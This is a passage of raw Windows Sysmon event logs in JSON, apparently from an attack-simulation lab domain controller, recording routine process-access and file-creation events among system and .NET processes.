06:59:48.149","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12E4-5F25-0000-00107B170A00}","TargetProcessId":"5100","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:59:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7016,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:48.165\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-12E4-5F25-0000-00107B170A00}\r\nTargetProcessId: 5100\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:48.165","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-12E4-5F25-0000-00107B170A00}","TargetProcessId":"5100","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7017,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:59:48.290\r\nProcessGuid: {E2A3D6B1-12E4-5F25-0000-00107B170A00}\r\nProcessId: 5100\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\13ec-0\\System.ServiceProcess.dll\r\nCreationUtcTime: 2020-08-01 06:59:48.290","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:59:48.290","ProcessGuid":"{E2A3D6B1-12E4-5F25-0000-00107B170A00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\13ec-0\\System.ServiceProcess.dll","CreationUtcTime":"2020-08-01 06:59:48.290","EventReceivedTime":"2020-08-01 06:59:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7018,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:48.321\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-12E4-5F25-0000-00100F1B0A00}\r\nTargetProcessId: 4876\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:48.321","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-12E4-5F25-0000-00100F1B0A00}","TargetProcessId":"4876","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7019,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:48.321\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12E4-5F25-0000-00100F1B0A00}\r\nTargetProcessId: 4876\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:48.321","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12E4-5F25-0000-00100F1B0A00}","TargetProcessId":"4876","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:59:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7020,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:48.337\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-12E4-5F25-0000-00100F1B0A00}\r\nTargetProcessId: 4876\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:48.337","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-12E4-5F25-0000-00100F1B0A00}","TargetProcessId":"4876","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7021,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:48.415\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-12E4-5F25-0000-0010761E0A00}\r\nTargetProcessId: 3788\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:48.415","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-12E4-5F25-0000-0010761E0A00}","TargetProcessId":"3788","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7022,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:48.415\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12E4-5F25-0000-0010761E0A00}\r\nTargetProcessId: 3788\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:48.415","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12E4-5F25-0000-0010761E0A00}","TargetProcessId":"3788","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:59:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7023,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:48.430\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-12E4-5F25-0000-0010761E0A00}\r\nTargetProcessId: 3788\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:48.430","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-12E4-5F25-0000-0010761E0A00}","TargetProcessId":"3788","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7024,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:48.555\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files 